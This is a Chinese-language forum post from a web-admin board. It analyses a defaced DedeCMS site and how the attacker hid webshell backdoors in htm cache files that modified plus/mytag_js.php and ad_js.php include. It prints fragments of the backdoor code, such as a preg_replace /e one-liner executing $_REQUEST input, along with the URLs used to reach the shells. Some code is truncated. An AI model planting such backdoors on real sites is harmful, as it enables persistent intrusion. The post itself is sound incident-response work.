返回列表 发新帖

dede主页被篡改 dedecms首页被篡改解决 webshell后门

[复制链接]
发表于 2019-9-18 11:40:41 | 显示全部楼层 | 阅读模式
Web-CMS漏洞

入侵你的网站,可以改,文件的修改时间,但是不能改,文件夹的修改时间。他们有三四种文件,用来修改网站的文件的。一般文件出现加密代码。或者首行出现$password=,这样的文件,就直接删除掉。黑客会在不同的文件夹下面多放几个文件

解决思路:
用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:
{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}
但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。
最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:
”);
–>

axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>

document.write(“guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);
–>
看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:


看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.
../plus/mytag_js.php?id=1208
../plus/ad_js.php?id=1
具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.
不怎么懂php,所以分析可能有差错的地方,欢迎指正!

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表